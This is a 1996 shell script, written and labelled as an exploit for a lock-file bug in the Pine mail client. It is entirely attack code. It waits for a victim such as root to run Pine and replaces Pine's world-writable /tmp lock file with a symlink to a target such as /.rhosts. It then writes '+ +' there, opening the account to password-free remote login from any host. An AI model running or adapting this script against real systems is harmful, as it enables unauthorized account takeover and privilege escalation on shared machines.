#!/bin/sh
#
# pine bug exploit
#
# usage: pine.sh username path/file_to_create &
# ex:    pine.sh root /.rhosts &
# ex2:   pine.sh root /.rhosts > out & (and go to sleep).
#
# version 3.91, 3.92 .....
# version 3.95 fixed
#
# Note: must do some changes in the script. look 4 CHANGE THIS:
#
# Yea i know is a lame script but is better than nothing..
# try to exploit the bug without a script and you will wait
# forever.
#                     e-torres@uniandes.edu.co
#

argumentos=0
if [ $# -eq $argumentos ]
  then
    echo "Usage: $0 username path/file_to_create & "
    echo "ET Lownoise 1996 Colombia"
    exit
fi

username=$1
archivo=$2

#CHANGE THIS:

#text='text to puit in file to create'
#usr=path of the program users
#pineprog=how the pine program appears when u do a w (who) command

text='+ +'
usr=users
pineprog=pine

#
date
echo "- Looking for $1 to log in... just wait"
#
entrada=0
entro=0

until [ $entro -eq $entrada ]
do
        for nombre in `$usr`
        do
         if [ $nombre = $1 ]
            then
                entro=1

         fi
        done

done
date
echo "- Ok $username is logged now."
#
echo "- Lets wait that $1 run pine. "

noejecuto=0
ejecuto=0

until [ $ejecuto -ne $noejecuto ]
do

     for ejecutando in `w $username`
     do
       if [ $ejecutando = $pineprog ]
         then
                date
                echo '- OK ' $1 ' is running ' $pineprog '.'
                ejecuto=1

       fi
     done

done

echo "- Now lets grab the lock file of $username from /tmp"
ls -al /tmp | grep $username > temp1
cat temp1 | grep rw-rw-rw- > temporal
lockfile=`awk '{print $9}' temporal`
rm temp1
rm temporal
echo "> Username $username"
echo "> Lockfile $lockfile"
echo
echo "- OK now im going to wait that $username "
echo "  quits $pineprog "
# do it till exist lockfile, that means username havent quit pine
cd /tmp

while [ -s $lockfile ]
    do
    sleep 0
done

cd
date
echo "- OK $username quit $pineprog .. now to link $lockfile "
#$archivo is the complete path of file in username
cd /tmp
ln -s $archivo $lockfile
echo "- $lockfile is now linked "
cd
echo "- $username must now return to pine to create"
echo "  $archivo "
echo "- Waiting $username to return pine "

noejecuto=0
ejecuto=0

until [ $ejecuto -ne $noejecuto ]
do
     for ejecutando in `w $username `
     do
       if [ $ejecutando = $pineprog ]
         then
                date
                echo '- OK ' $username ' is running ' $pineprog
                ejecuto=1

       fi
     done

done
echo "- Introducing text..."
cd /tmp
echo $text > $lockfile
echo "- Erasing $lockfile "
rm $lockfile
cd
echo "THE END DUDE!"